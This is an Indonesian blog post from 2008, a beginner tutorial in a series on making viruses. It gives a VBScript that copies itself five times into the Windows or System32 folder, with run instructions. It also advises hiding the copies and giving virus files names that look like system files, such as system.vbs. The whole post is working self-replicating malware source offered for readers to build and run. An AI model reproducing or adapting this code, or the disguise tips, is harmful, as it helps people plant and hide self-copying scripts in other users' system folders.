12.25.2008

Infeksi Folder Spesial

0 komentar

(Tutorial ini hanya bagi PEMULA. bagi yang sudah profesional, bisa diabaikan. Tapi kalo mau baca juga gak papa ko')

Jika Virus "Clonner" dan "Clonner Hidden" kemarin hanya mengcloning dirinya pada foldernya, maka Virus kali ini akan mengkloningkan dirinya ke Direktori/Folder Spesial yang dimiliki Windows yaitu Fonder Windows ataupun System32.

Biasanya para Virus Maker membuat Master/Induk virus pada Folder Spesial tersebut dan memberi nama mirip dengan data sistem lain, notepad.vbs/system.vbs/boot.vbs dan lain-lain yang bisa aktif kapan saja.
Begini cara membuatnya :

1. Buka Notepad atau lainnya.

2. Salin Script berikut :

On Error Resume Next
dim Vir,Rus,Clo,Ning,Special
set Vir=CreateObject("Scripting.FileSystemObject")
set Rus=Vir.opentextfile(wscript.ScriptFullName)
Clo=Rus.readall
Rus.close
Special=Vir.GetSpecialFolder(0)
for V =1 to 5
set Ning=Vir.CreateTextFile(Special & "\Clonner Wind" & V & ".vbs")
Ning.write Clo
Ning.close
next


Kode 0 dapat kalian ganti dengan 1 apabila ingin menempatkan induk virus pada folder System32. Dan bila mengganti kode 1 to 5 sebaiknya jangan terlalu banyak, agar Folder Wondows kalian tidak penuh dengan virus ini. Ini juga bisa ditambahkan atribut agar tersembunyi/hidden seperti pada Virus Clonner Hidden.
3. Selanjutnya simpan, jangan lupa seperti biasa trus kasih nama "Clonner Wind.vbs" (Tanpa tanda petik).

4. Jalankan file Clonner Wind.vbs.

Setelah Virus dijalankan coba kalian lihat pada Folder Windows kalian, biasanya di "C:\Windows\" maka didalamnya akan terdapat file baru bernama Clonner Wind1.vbs, sampai Clonner Wind5.vbs.
Wes disek yo, kesel ngetike...

0 komentar:

Posting Komentar

Related Posts with Thumbnails